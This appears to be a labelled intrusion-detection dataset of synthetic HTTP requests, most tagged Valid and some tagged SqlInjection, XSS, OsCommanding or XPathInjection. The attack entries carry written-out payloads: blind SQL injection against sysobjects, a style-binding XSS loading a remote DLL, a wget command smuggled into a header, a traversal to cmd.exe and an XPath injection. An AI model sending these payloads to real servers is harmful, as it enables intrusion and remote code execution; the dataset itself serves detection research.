Host: www.w3olOM.ch
Connection: keep-alive
Accept: video/mpeg, video/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ofdgs-0gjr;q=0.1, eH6siLc-cnga
Cache-Control: max-age=5217
Client-ip: 250.51.114.142
Cookie: ecatn=3940101;Zhtpass1CX85stdin=72063;jlrdareuh8e=ou0eHceeE;ihLs8fAWignapba=O8~tmpgroup byseuo@;h0hctetsEpeht=Nxn
Cookie2: $Version="6"
Date: Wed, 22 Apr 09 04:20:26 UTC
ETag: "F4pahYczbUumgOsX-cl1"
Expect: 100-continue
From: 9Hmsl7@qEiue.biz
If-Modified-Since: Thu, 09 Mar 06 02:47:58 UTC
If-Unmodified-Since: Thu, 10 Jan 08 01:32:48 CET
If-Match: "ZIiCqR1Zpz.JQ_FudFGP"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iiniu"
Authorization: NTLM YWRzaWVhZWxmbXRvZWVlandzUWdkalJtdG9pcXRncml2
Range: -6368,61889-
Referer: /qjoo/Irttclbe.tiff
TE: trailers,gzip;q=0.0
Trailer: Connection
User-Agent: Mozilla/1.4 (X11; U; Open BSD i386 0.4; 9s-ai; rv:1.7.0) Gecko/23012402
UA-CPU: Sparc
UA-Disp: 752,4892,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 886x1949
Via: FTP/8.6 www.htalsX2m.png
Transfer-Encoding: compress
Upgrade: uk7m/5.7, hswlu/4.6
Warning: 895 www.ef4ioNd.js "fj9cdOInrh" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18763
Start - Id: 42532
class: SqlInjection
GET /easmea3ae5hfEeamce/Wfwp-87P6/nn5lrJhT7m/camibuTh.mdb?95=AND+ascii%28lower%28substring%28%28SELECT+++++TOP+++1+++uoahmiO++FROM+++++sysobject++WHERE+++++xtype+++%3D+++%27U%27%29%2C1%2C1%29%29%29+%3E+++++111 HTTP/1.0
Host: 233.200.186.170:80
Connection: close
Accept: text/*;q=0.6, video/mpeg;q=0.9, audio/*;q=0.4
Accept-Charset: macintosh;q=0.5
Accept-Encoding: 
Accept-Language: ha-ie;q=0.0, l-s0
Cache-Control: max-age=8193
Client-ip: 193.221.217.71
Cookie: YpC8Vi6NCelN=gsr6oi;tlt8Ede287=oFbMMat;Ion=sn1t;6ti=Ijg69EcsT;ddblbgutt5iEH7=55
Cookie2: $Version="051"
Date: Sat, 28 Jun 08 05:52:55 GMT
ETag: W/"2W7s5-ENre8Dzaenr_N"
Expect: neemneE=eddo
From: bs1as@pton6i0pc.org
If-Modified-Since: Fri, 16 Oct 09 19:35:19 CET
If-Unmodified-Since: Fri, 12 Nov 04 08:02:17 GMT
If-Match: *
If-None-Match: "2nbWypMfZ6WZ@btTMgbq"
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 57
MIME-Version: 5.3
Pragma: drde='7e'
Proxy-Authorization: Digest nc=ABB8e3d4
Authorization: esqe 9ohn3egn=se3ero
Range: 79786-446
Referer: /lrtsAes.pdf
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: naeifdbwnR/9.5.5.4.5
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 7.3 125.59.143.86, cotrl/2.5 www.htimiaar.tiff, FTP/6.2 22.2.180.118
Transfer-Encoding: identity
Upgrade: hdxl/4.1, ir1i9/2.4
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42532
Start - Id: 11655
class: Valid
GET /Hl64/owsebaEnrra1tsnrySi/tIzlmKZ/9u8rVEoBC1Y/t4lPOk4WAzhjDK3fB.q/ejf1ItDWsoentloe/zIucabzI.asmx?gyeoRqsZsg5ditW=e%40+aNIbiframetnyc3etnwiu&BTzOk0k1i=9&raj4van4iouitqi=az4df9Scfromtt&trtikhymcLbrc=1716350&sdDS=n+elrte%5Cnedh6nho&osiv=lteeaa+ndo3it&peiaeRTree=+e&ane3eraozte=e9Ms0eM&piljRet=4auxnO0e_&zA5eteenraearo=639&THzWnV=oDea&d-Ptu-2.S4J=25129315&Ol37taeyehei=781730 HTTP/1.1
Host: www.9gybheua.cz:80
Connection: keep-alive
Accept: text/xml;q=0.8, application/zip
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: cda-eNvdb, eweje0oR-wccer;q=0.5, 2u-ucnm4t;q=0.3
Cache-Control: no-transform
Client-ip: 79.167.84.97
Cookie: ater=Tfurl9ddayekbetm4tte
Cookie2: $Version="94"
Date: Fri, 04 Jul 08 13:45:21 UTC
ETag: W/"67qV0aPplHbM4HXR"
Expect: eThAaoa
From: yspI@eunniwes.st
If-Modified-Since: Wed, 24 Oct 07 07:38:34 UTC
If-Unmodified-Since: Fri, 14 Apr 06 21:16:58 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 28 May 07 14:44:43 GMT
Max-Forwards: 0115
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic bm5pc3RlZWE6YWlsbA==
Authorization: NTLM VGxhYXVldEFhZTIzaWF0ZTNzb2Zzd2ltckxyYXgybmRlb2MxYQ==
Range: 5854-,364225-
Referer: /amamhhiu/3go4nw/9pshior/asyydahw/leUst.gz
TE: gzip;q=0.5
Trailer: If-Range
User-Agent: utLjD61 http://www.Esannn.com
UA-CPU: PowerPC
UA-Disp: 3478,401,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 178x213
Via: FTP/5.7 140.143.127.141, HTTP/2.4 www.otyedi.jpeg, 9.3 www.edybra.shtml
Transfer-Encoding: deflate
Upgrade: hlxsqA/9.5, uwu3t/0.9, ep0si/7.6
Warning: 062 147.28.128.111 "yeya0Tla6en" 
X-Forwarded-For: 106.177.217.179
X-Serial-Number: 7331702860784
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11655
Start - Id: 20298
class: Valid
GET /smis/lh1pn4iki/EevalwhereFformKPcNO7.js? HTTP/1.0
Host: www.eltum.ch
Connection: wu8ee8o8
Accept: */*;q=0.4
Accept-Charset: gb2312;q=0.4, iso-8859-15
Accept-Encoding: *;q=0.9
Accept-Language: hne0Es-qrrmo;q=0.7, iksi-ts;q=0.4
Cache-Control: no-store
Client-ip: 235.128.217.246
Cookie: n2eattteLce=ra;jeiaas=334
Cookie2: $Version="178"
Date: Tue, 21 Feb 06 02:42:50 GMT
ETag: W/"idK2rQ563WzVLVCFlS"
Expect: tetn18re=iUidv
From: iejOssn@7qEdttaoe.st
If-Modified-Since: Mon, 05 Jun 06 16:40:32 CET
If-Unmodified-Since: Sat, 17 Apr 04 10:39:45 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Apr 09 11:05:10 GMT
Max-Forwards: 1188
MIME-Version: 5.4
Pragma: Nn=etSels
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: Digest username="velhSN0n"
Range: 8-31,-2,-9878
Referer: http://www.nip688ih.cz/ntoa0a1/idiw/xAQn/oyso.msf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 7.4; cl-en; rv:9.9.7) Gecko/95967725
UA-CPU: PowerPC
UA-Disp: 2037,1915,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: 8.8 118.72.126.115, 4.3 224.99.164.170:8508
Transfer-Encoding: identity
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 569 www.tlhiuw.shtml "elwtdywe4Thero" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 20298
Start - Id: 4770
class: Valid
PUT /xjEsmTLNs/trcusXAjAlZ9Fjj/r70zibnJjC27Vew.mspx? HTTP/1.1
Content-Length: 168
Content-Language: n9ao4,rihhn
Content-Encoding: deflate
Content-Location: http://www.r41eOev.uk/23i0Cel/tfr92Ti.conf
Content-MD5: bGlkaG5RdHJoaWlrYWRyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Dec 09 16:47:40 GMT
Last-Modified: Fri, 12 Mar 10 16:50:00 GMT
Host: www.LuNiibmii.biz
Connection: keep-alive
Accept: audio/x-wav;q=0.2, audio/*
Accept-Charset: windows-1252, x-mac-hebrew;q=0.6, windows-1250;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 254.83.80.151
Cookie: a2zna=3;Ndpvargvl=hze=s a\&e;ienlc=kpfPu;erwmeec=select-e
Cookie2: $Version="0"
Date: Sun, 22 Apr 07 11:37:46 UTC
ETag: "m_DfcAX2Zv@LCSSU5ki"
Expect: mijtq5m
From: mstn@emie289et.fr
If-Modified-Since: Thu, 22 Mar 07 08:18:17 CET
If-Unmodified-Since: Wed, 05 Aug 09 18:01:02 UTC
If-Match: "6PuC6aVp2qKOk5uwlF"
If-None-Match: *
If-Range: Mon, 25 Dec 06 08:46:15 CET
Max-Forwards: 2
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: hpLcsa rrpn3nbs=naldo
Range: -223574,77-
Referer: http://www.twhr.org/sHa6ntv/9hte.wav
TE: trailers,chunked;q=0.3,chunked
Trailer: If-Unmodified-Since
User-Agent: vllshsuittp
UA-CPU: PowerPC
UA-Disp: 717,3860,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 163x2110
Via: rmnarl/7.6 www.ejrgsy.shtml
Transfer-Encoding: compress
Upgrade: oztaha/7.1, ety84n/6.4, tte/5.0
Warning: 614 www.estp5.css "8itmfoosroUu" 
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

raomWsiewiatBp3=Sj~4W|zlEhn7i4eybodyj n&.Yvj=[Urs&edd=httpwh ripositionwx 0link'mie8iao&MD4uh.Fx4_=tboro&a1llT=neet&.xwIusystem=|ilf t;&31dsSe3eittq5f=9U3Bj

End - Id: 4770
Start - Id: 48165
class: XSS
GET /tacadcat3m/syM5DtQXqZ8Jf8ji/Ah4tNtrscisea/iCSNscriptFWO_5bgsound/twsHaieguehtxnklot3w/55.XgyUF3nkJKO_kUM..mspx?s0xZmmrres6t=%3Cdiv+++++style+++%3D++++%22binding%3A++url%28%5Bhttp%3A%2F%2Fwww.deonol.com%2Fscript%2Fqcr0At0.dll%5D%29%3B+++++%22++++%3E HTTP/1.1
Host: 248.199.94.247
Connection: oieu7cn
Accept: video/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t-fapzt7b;q=0.3, 2nphl-entso;q=0.8, gziu-socn
Cache-Control: min-fresh=6478
Client-ip: 211.190.214.99
Cookie: ls=5a cd9r/h
Cookie2: $Version="6"
Date: Sat, 29 Mar 08 11:49:46 UTC
ETag: W/"wLLWa.uJcLAhn76"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Tue, 22 Feb 05 20:22:23 GMT
If-Unmodified-Since: Tue, 21 Oct 08 07:14:07 GMT
If-Match: *
If-None-Match: "ZVMgKa2V8G1t.pxv"
If-Range: Sat, 31 Dec 05 16:00:02 CET
Max-Forwards: 76
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest response="aBdf4fC95F1B9FE4Ca730b253131D207"
Authorization: NTLM dHJrZWRhZDlzZXR5b2VlYWJUSm1sZHNRbXRpaG5ldG5sbG90
Range: 248-
Referer: /iYattrol/Eoheede/hMspd.png
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.4 (Windows; U; Win98 8.5; Ao-Ht; rv:9.5.9) Gecko/69735438
UA-CPU: MIPS
UA-Disp: 472,3569,8
UA-OS: Win98
UA-Color: color16
Via: Xtp/2.8 68.47.189.195, FTP/8.0 106.168.39.64
Transfer-Encoding: grg3ro
Warning: 486 www.atez.js "rTdlO" "Wed, 05 Dec 07 16:03:20 UTC"
X-Forwarded-For: 129.132.255.71
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48165
Start - Id: 11874
class: Valid
GET /ntoteicyoum/nLeEnmnst36y2ttr.jsp?uwcjrsAa6n=tGr%3Bd&c6tinrihdaaejai=etoptphpoe&jmpv6us=18331&VCVek6=9897992&it=889&hi=sbd8MsMKyzzY&eslmotua8=z6betjgeruihod3o5&K5sB0O=setnmctLs&ethe0cemol8=lot33Nvnntrilt&wle=ynaEt&rifih7eaUNa=tsY6ZXRSqZ&pXmscrRet5rd=nesi&txbei=699296&ewt9h=4N HTTP/1.0
Host: www.zvOuaela.fr
Connection: 9spte7lo
Accept: video/*, image/gif;q=0.8, application/x-tar;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: compress, identity
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 253.123.138.51
Cookie: n9bIk=7015219;kLls3lU=712;mneonwgnaohj=5ekp2y1
Cookie2: $Version="549"
Date: Fri, 12 Mar 10 12:18:28 GMT
ETag: "4_aFg12lxK-sYw4.W"
Expect: eo6ITna=f0lro7h;mqmonjt
From: letI@hnH5isut.cz
If-Modified-Since: Thu, 08 Oct 09 05:16:15 CET
If-Unmodified-Since: Sat, 20 May 06 23:32:35 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4074
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic bmtOZDo0ZTVp
Authorization: Basic aXVoY21vUjpiNHZk
Range: -35,-883,-072
Referer: http://www.attx.net/kEagNw/jso3i4/o4akaA.gz
TE: trailers
Trailer: Pragma
User-Agent: tyoetb8eu/4.4.9.7
UA-CPU: PowerPC
UA-Disp: 529,350,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 872x2543
Via: 6.8 110.8.64.253
Transfer-Encoding: deflate
Upgrade: 6tBb5/8.0, exe/8.3
Warning: 165 174.179.176.135:93465 "taieryl3onnp5cttaanx" "Wed, 31 Dec 08 04:33:55 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 02595980702101510
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11874
Start - Id: 31947
class: Valid
GET /etSK7bKk_I3E7fZ4/rNlLnDDXqrowss/.tKB7dvand/ngUh/8hni8dnGesghremi/llmhPIYXJBZ-P6cJ.Im/dliwokuSO2R/s7iilh6kbe6/2Vji4gbzjSKPEYQ0/f2ytuHfPuKwV.shtml?flee=4fEA4vMPZ&otsiutbpr=iqem8%3D+oaxsJox&mtt9esEt35=r+swjwherepasswdiescript%40yt%3Cz3&ZinputNUbbKY=566&4i0L=ooEovimnafssyawmlg&anfa=a.-_4U&4snOrao5ixTo=564549 HTTP/1.1
Host: 90.122.249.75
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.9
Accept-Language: e-sg7the, B-w, aitsd8-hrm;q=0.7, sh-Adp2
Cache-Control: max-stale
Client-ip: 114.29.153.102
Cookie: m8dpvit=senEtOofL1atren;1ehr3riPaoe7ssg=le6rb91eetmp;bisyqilE1iaod=m313QOL7yvi;5d97=rihigsomochaeeslr
Cookie2: $Version="84"
Date: Fri, 01 Jan 10 08:54:18 UTC
ETag: "vMcUI3iNgXpZhcM"
Expect: dIiLec=ZeoefT
From: h4ras@eu8lf.gov
If-Modified-Since: Mon, 26 Jan 04 12:29:23 GMT
If-Unmodified-Since: Thu, 30 Jul 09 04:27:57 GMT
If-Match: *
If-None-Match: *
If-Range: "WGktA-jiSc3QzphXgMM"
Max-Forwards: 72
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM ZXJyWGU4c2VtZDhhZWVlbnVsM2dlODF0bHJyb2xvdmFzZWQ=
Authorization: Basic eXRuRXM6aXNpdGlp
Range: -8,3314-2228
Referer: /sievtkr.avi
TE: trailers,chunked
Trailer: Expect
User-Agent: hsgWjP4rq http://www.ntmbcdd.be
UA-CPU: 68000
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6622x661
Via: 4.5 16.171.227.92, e9ti/1.1 244.16.70.164
Transfer-Encoding: deflate
Upgrade: nKety0/5.6, wZTeeb/7.6
Warning: 242 www.rcwaSt.htm:40915 "sTocmmAaEsilo8zeaoao" 
X-Forwarded-For: 21.6.131.96
X-Serial-Number: 9668437330474941
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31947
Start - Id: 42947
class: OsCommanding
GET /TisAhlsMa/7VQ4efexa/hh-4hdFo7Yssmdk2aEb.gif?esIjxeaRgenR=uRYR1&npc=927&ehnae=a+9%5B2+al+oscrnu&a6te=1449697&tm=336 HTTP/1.1
Host: 168.114.24.236
Connection: close
Accept: application/postscript, image/png;q=0.5, text/*
Accept-Charset: iso-8859-1, euc-jp, iso-2022-jp;q=0.6, euc-jp
Accept-Encoding: "   ;   /usr/bin/wget    www.mech.com/stliar    ;
Accept-Language: *
Cache-Control: hrdiEw=ad
Cookie: psnerOjtte=oadrsc1d
Cookie2: $Version="8"
Date: Wed, 05 May 10 14:14:27 UTC
ETag: W/"7U_s6vzue.sjFf@9"
Expect: nes5git=atdaShae;HDSj=bcepo4em
If-Unmodified-Since: Tue, 03 Aug 04 22:37:19 CET
If-Range: *
Max-Forwards: 9932
Referer: /polo/saeenP/Ouhm.cgi
TE: trailers,trailers,chunked;q=0.5
User-Agent: h_D8MlZ_dP http://www.rneTe.org
UA-Color: color8
UA-Pixels: 5826x272
Via: ar6o/2.0 www.selecC.png:754, FTP/2.5 www.Xwbrevu.png, 4.8 93.233.130.156
Transfer-Encoding: compress
Upgrade: cml/5.9

null

End - Id: 42947
Start - Id: 8961
class: Valid
GET /aievstse/lZcXELCHf/sG/CAechoandZkzb7yV3sock_streamJR/mc.q9xG3EJeFJ4ZT/krodt9b.js?Sip=zkYdDdfIQ5E HTTP/1.1
Host: www.shsshtt7no.st
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesesimp;q=0.5, x-mac-arabic, isiri-3342;q=0.2, x-mac-ce, euc-jp
Accept-Encoding: 
Accept-Language: osea-idte6ei, a1y-fmcEl;q=0.4
Cache-Control: f5y=bD
Client-ip: 25.85.108.94
Cookie: hcghokoDb=cYhk0
Cookie2: $Version="894"
Date: Tue, 28 Jul 09 04:38:07 CET
ETag: "FIGwzlov_YY1FTvn"
Expect: 100-continue
From: enona@meryupld.st
If-Modified-Since: Fri, 29 Feb 08 12:33:25 GMT
If-Unmodified-Since: Fri, 29 Jan 10 04:18:25 CET
If-Match: "I9I1euHyzPFbE6pqVZG"
If-None-Match: "gUzGhzu8gXv-y9vUZM"
If-Range: *
Max-Forwards: 592
MIME-Version: 7.6
Pragma: os=rsCtcw
Proxy-Authorization: tNnw Thot=heMot0um
Authorization: Basic cmVyZWw6cmNkT3UwZA==
Range: 0331-,4394-646932
Referer: /9rTsp.ace
TE: trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 5.2; ea-uB; rv:1.5.4) Gecko/46595960
UA-CPU: PowerPC
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 557x3497
Via: HTTP/7.6 www.errghLj.htm
Transfer-Encoding: deflate
Upgrade: neh6ae/0.8, ua61t/0.4, pduRa/4.8, slsp/5.5
Warning: 034 120.251.201.26 "6paPteqsaraAe" "Sat, 13 Jun 09 10:17:27 UTC"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 982389544
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 8961
Start - Id: 44079
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 10.240.54.129:542
Connection: ncoobiot
Accept: video/mpeg, image/*
Accept-Charset: macintosh;q=0.3, isiri-3342;q=0.3, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: etsHr-ici6rEb, vd-1, eu-pyk;q=0.8, bteno8r-hsay;q=0.9
Cache-Control: only-if-cached
Client-ip: 118.75.169.199
Cookie: fZvkdNKW=dropbeet58ogecm0;Ustns85tehNNons=a6O.P_e;lceosrlqtoe5=a3autwwlIa7eb;aoi8n=568;ateeirth=LuDcibferZ0ce
Cookie2: $Version="4"
Date: Sun, 26 Jul 09 06:34:23 UTC
ETag: W/".Z.c4.xeA3kSTWv"
Expect: 100-continue
From: eyde@enOee.biz
If-Modified-Since: Fri, 16 Nov 07 05:28:22 CET
If-Unmodified-Since: Sat, 07 Feb 04 23:08:12 UTC
If-Match: "4izoy@O-uWLf6iB"
If-None-Match: "MDPo74HHIQKQy_hE7"
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 5390
MIME-Version: 3.4
Pragma: o8na='dama'
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: NTLM QXljZXllaGF5MmljY3BzbHE0MHN0dW50Tm9yaW55Y3R0RWV0d250R200
Range: 70-
Referer: http://www.igeopttc.uk/qeeO/hshq.js
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: d7aDpoud/9.4.6
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4959x090
Via: 6.7 www.3x5m.html, peh/8.6 www.ytrtsbGZ.js, HTTP/3.6 30.37.47.72
Transfer-Encoding: compress
Upgrade: unHis2/9.7, sDw/8.7
Warning: 247 www.hxe31.png "9a02iegsdsel8esiecoC" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44079
Start - Id: 15382
class: Valid
GET /NRMhZ/ePqM.js?ifi=23612098&VWOJy=aprocessing-instructionl+%3FeN1&carAsyybeO=i&2tMawujtsReq=6&vD0da5nece=5437363&dta=eWBqKYlQK&D7_aR-replace=6hastub6Tc&szbrslrn8tseea=letr&edaspss=12378&ef9=SsnautoexecyndandceutiS&tctth=9 HTTP/1.1
Host: www.rtrtwiyne.gov:80
Connection: ssezne
Accept: */*
Accept-Charset: windows-1258;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 227.10.221.194
Cookie: m5n7as=518;XPYcopyu9eC6=0776071616;rs1hem0gv3i=auw;BfhFk=t'https;bee=83923012
Cookie2: $Version="5"
Date: Fri, 22 Jun 07 12:39:06 UTC
ETag: W/"K32uOEH0nFv5TDh"
Expect: taS04eor=niqoa2A
From: geinl@l3cifnrd43.fr
If-Modified-Since: Tue, 20 Oct 09 09:45:07 CET
If-Unmodified-Since: Sun, 21 Jun 09 19:40:38 UTC
If-Match: *
If-None-Match: "oQBBtEvb6IwG6Rhk"
If-Range: *
Max-Forwards: 629
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: l7kr5 aism8h=ekiama5a
Authorization: Digest uri=/vaeeyin/svnooe45/tlbm.php4
Range: 41-,07174-
Referer: http://www.edsy.biz/9tcts/rAl6oA/8deicth/tt8w.exe
TE: gzip,deflate;q=0.4,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.3 (Machintosh; U; PPC 5.4; ag-ca; rv:1.7.3) Gecko/53928921
UA-CPU: x86
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: HTTP/9.2 www.oevhc.tiff, elqcg/7.6 40.157.194.129
Transfer-Encoding: compress
Upgrade: o0onr/9.5
Warning: 850 186.24.247.67 "8prfa" "Tue, 18 Dec 07 05:47:03 UTC"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15382
Start - Id: 48621
class: XPathInjection
PUT /oNbV3VC7/etHyX/yegiE8F0zMMK-nkEys_i/hnaitEiitoew6rh3r/eBWQSULT@8/rnAHYIYhNZiP/7@c-f/ahNGpt3hhetmntg/yT37ePfPd/aEaR.26fxKpS3zp/Wr5srcpT.tiff? HTTP/1.1
Content-Length: 337
Content-Language: qheMkn,s5s
Content-Encoding: compress
Content-Location: http://kw5dcej.gov/eiOiEp/cnppxait/wojin/uDMae/akcts.rar
Content-MD5: ZWlsdHU4NGV0c3BhaWFudA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Dec 08 03:31:03 UTC
Last-Modified: Sat, 30 Sep 06 01:43:18 CET
Host: www.hans.fr
Connection: tnzlaoq2
Accept: */*
Accept-Charset: windows-1251;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 92.5.125.205
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="281"
Date: Mon, 05 Jan 09 13:29:00 UTC
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: eMrs8rmb
From: ewioailt@flio7hb.com
If-Modified-Since: Sat, 06 Feb 10 10:54:15 CET
If-Unmodified-Since: Sat, 24 Nov 07 12:47:26 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 7.4
Pragma: iuide9='Wte5at'
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Digest response="A914f85588DD5FB0c45e27bcc8caEEBD"
Range: 939-64,563448-00397,65796-
Referer: /rnHurtsN/8et33iI/uXthq6/zen5wf/tuebth.mdb
TE: deflate;q=0.2
Trailer: Referer
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 7.2; tt-sr; rv:7.3.5) Gecko/39248274
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: deflate
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

abThtg=pzh&sma0=981710&aqtd=Eie&edmcsu=e8xtermnsmooaa&ewpYeetat1arR2d=(i <    count(ebct8/child::text()) and    j     <     count(eyce2o/child::comment())   and  k  < count(hSufba/child::*)    )&cvhc2no=oce7p1defo&an=shutdownu\ e&cHlhnptxmeeabBo=a\pceco+escriptopencatl&0QN1HD68MW6=0

End - Id: 48621
Start - Id: 29874
class: Valid
GET /ahKao2jkquFWAxnI.Ieg/7p-@22JLz1o/ofdee24xwudi/p15cL7Gr8Fkk6Jmrif/c4Wfe8hPz6dcRIg.jpeg? HTTP/1.0
Host: www.yaaec.com:80
Connection: close
Accept: audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: compress, compress
Accept-Language: r-xG31R, a2wc-hea3
Cache-Control: no-store
Client-ip: 192.8.187.37
Cookie: axstnn=ofIeGLX6Nj7Z;il6pml0q=ceuvgBgsatc;d0rk9irqbe=67488377;hnt=053;E2ga4uat6t=r43positionra49mpon;g3Wh=dbrWK2-YRb
Cookie2: $Version="1"
Date: Sat, 27 Feb 10 10:31:42 GMT
ETag: W/"GUiClklxk_WzTJ1ALi"
Expect: ermu
From: hggtsom6@ieylr.uk
If-Modified-Since: Mon, 20 Aug 07 09:27:14 GMT
If-Unmodified-Since: Sat, 02 Feb 08 09:39:08 GMT
If-Match: "gZUUMKgU3xzE-rB"
If-None-Match: "GjkUPWhH.jAqOGL"
If-Range: Fri, 24 Mar 06 03:10:18 GMT
Max-Forwards: 1
MIME-Version: 7.6
Pragma: r4=xors
Proxy-Authorization: Digest response="45DcFe932F9403C0A2bd6e0bCfDd5a07"
Authorization: NTLM ZWlzc3hpcnNlYXNxc2ljZWVpZW9yYkxza2lhc29jaHNPdTY=
Range: 107-87279,2-
Referer: http://thhtsms.gov/8swrn/ziBstas/kstInc8/5taomsg.wmn
TE: chunked,chunked,gzip
Trailer: Via
User-Agent: Mozilla/5.5 (compatible; MSIE 0.6; Windows NT; Otaefmbt6; 0bge; srarrxan)
UA-CPU: StrongARM
UA-Disp: 724,467,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 952x914
Via: 2.9 19.111.183.191
Transfer-Encoding: identity
Upgrade: evdhet/6.4, yugwb/0.4, treioj/7.5
Warning: 335 www.dsiaaa.shtml:4 "tckleRbsz8p" "Wed, 14 Apr 04 10:29:41 GMT"
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 82258082988548
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29874
Start - Id: 13960
class: Valid
